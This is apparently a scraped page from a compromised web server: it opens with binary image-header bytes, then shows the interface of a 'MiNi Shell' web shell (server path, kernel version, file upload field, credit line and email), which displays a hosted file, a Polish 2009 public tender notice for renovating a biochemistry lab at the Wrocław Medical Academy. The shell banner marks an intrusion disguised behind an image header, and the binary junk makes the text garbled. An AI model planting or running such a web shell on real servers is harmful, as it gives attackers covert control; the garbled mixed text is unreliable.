JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090206/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090206/19848-N-2009.html

<p class="kh_header"><b>Wrocław: Remont Pracowni nr 4 w budynku Katedry i Zakładu Biochemii Lekarskiej
Akademii Medycznej we Wrocławiu przy ul. Chałubińskiego 10.</b><br>
<b>Numer ogłoszenia: 19848 - 2009; data zamieszczenia: 06.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Medyczna im. Piastów Śląskich , ul. Pasteura 1, 50-537 Wrocław, woj. dolnośląskie, tel. (071) 784 00 44; 784-11-73, faks (071) 784 00 45.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.am.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont Pracowni nr 4 w budynku Katedry i Zakładu Biochemii Lekarskiej
Akademii Medycznej we Wrocławiu przy ul. Chałubińskiego 10..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont Pracowni nr 4 w budynku Katedry i Zakładu Biochemii Lekarskiej
Akademii Medycznej we Wrocławiu przy ul. Chałubińskiego 10.
Zakres prac do wykonania:
               a roboty budowlane ( prace demontażowe)
                     - rozebranie posadzki z deszczółek
                     - rozebranie posadzki z desek
                     - demontaż okładziny z płytek na ścianach w digestoriach i na stołach  laboratoryjnych
                     - odbicie zagrzybionych tynków na ścianach i suficie
                     - demontaż jednego digestorium
                     - rynna do gruzu, kontener do gruzu
                      Prace remontowe:
                     - odgrzybienie ścian i sufitu
                     - uzupełnienie tynków
                     - gruntowanie ścian i sufitu
                     - malowanie farbami emulsyjnymi ścian i sufitu
                     - licowanie ścian płytkami glazurowanymi do H=2,20 
                     - wyłożenie płytkami glazurowanymi  kwasoodpornymi digestorium stołów
                       laboratoryjnych
                     - płyta OSB ułożona na legarach istniejących
                     - warstwa wyrównawcza z zaprawy samopoziomującej
                     - posadzka  z płytek gres kwasoodpornych, antypoślizgowych
                     - opalanie farby olejnej ze stolarki okiennej i drzwiowej
                     - malowanie farbą olejną drzwi, okien, grzejników i rur
                       Prace dekarskie
                  - naprawa rynien i rur spustowych z blachy ocynkowanej
                     - podnośnik hydrauliczno- mechaniczny
                       Prace porządkowe
                  - wywiezienie i utylizacja elementów zdemontowanych
              b roboty elektryczne
                    - wymiana opraw oświetleniowych
                    - wymiana gniazd wtykowych
                c roboty sanitarne
                - wymiana zlewozmywaka żeliwnego na jednokomorowy z ociekaczem ze stali nierdzewnej
                   - wymiana podejść kanalizacyjnych PCV O 50
                   - wymiana instalacji wody cieplej i zimnej
                   - wymiana baterii zlewozmywakowej
                   - demontaż zaworów czerpalnych
                   - montaż zaworów czerpalnych
                   - montaż zaworów przelotowych
                   - demontaż podejść do kurków gazowych
                   - wymiana kratek wentylacyjnych.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.31.11.00-1, 45.33.24.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 2.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Ocena spełnienia warunków wymaganych od  Oferentów zostanie dokonana wg formuły 
 spełnia - nie spełnia  po sprawdzeniu czy Oferent :
-	  nie podlega  wykluczeniu na podstawie art.24 i art. 22  ustawy Prawo zamówień publicznych,
-	jest uprawniony do występowania w obrocie prawnym, zgodnie z wymogami ustawowymi
   i prowadzi działalność w branży budowlanej , sanitarnej i elektrycznej
-	posiada  pracowników z uprawnieniami  budowlanymi, elektrycznymi i sanitarnymi zgodnie z  przepisami prawa budowlanego, zapewni kierownika robót                                                                     z uprawnieniami i doświadczeniem zawodowym   w branży budowlanej , elektrycznej             i sanitarnej
-posiada Polisę OC od  odpowiedzialności cywilnej  zgodnie z rozporządzeniem Ministra Finansów  z dnia 17.04.2002 r obowiązkowego dla grupy zawodowej  architektów  i  budownictwa,  na podstawie   której regulowane będą należności  za wyrządzone  szkody  do kwoty  50.000,00 EURO. 
-	  posiada potencjał finansowy pozwalający na realizację zamówienia przy założeniu iż zapłata     za wykonane  zlecenie,  może być dokonana  po odbiorze końcowym.  
-   udzieli  co najmniej   5  letniej gwarancji  na  wykonane  roboty budowlane, elektryczne i sanitarne a na użyte materiały gwarancji producenta
-   wykaże, że wykonał min  3 podobnych zleceń  w ciągu ostatnich 3 lat, 
-   załączy podpisany projekt umowy.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> -. Oświadczenie oferenta, że: nie podlega wykluczeniu   z  postępowania na podstawie art. 24 oraz ,  że spełnia wymagania  określone w art. 22    - wzór oświadczenia  - załącznik nr     do SIWZ
-. Aktualny wyciąg z rejestru sądowego firmy lub zaświadczenie o wpisie do ewidencji działalności gospodarczej potwierdzające, że profil działania oferenta odpowiada   przedmiotowi  zamówienia oraz  zawierający aktualny wykaz osób  uprawnionych do reprezentowania oferenta wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
-  Zaświadczenie,  że oferent nie zalega   z płatnościami w ZUS i US  lub, że uzyskał zgodę na zwolnienie, odroczenie  lub rozłożenie płatności na raty, wystawione nie wcześniej niż  3 miesięcy  przed terminem składania ofert. 
 -   Wykaz zrealizowanych zleceń o podobnym zakresie (min. 3), wykonanych w ciągu ostatnich 3 lat,
 - Imienne przedstawienie kierownika robót  z uprawnieniami do  nadzorowania  robót budowlanych, elektrycznych i sanitarnych.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.am.wroc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół ds. Zamówień Publicznych Akademii Medycznej we Wrocławiu przy ul. Mikulicza-Radeckiego 5, pok.221, II pietro.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.02.2009 godzina 10:00, miejsce: Zespół ds. zamowień Publicznych Akademii Medycznej we Wrocławiu przy ul. Mikulicza-Radeckiego 5, pok.221, II piętro.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com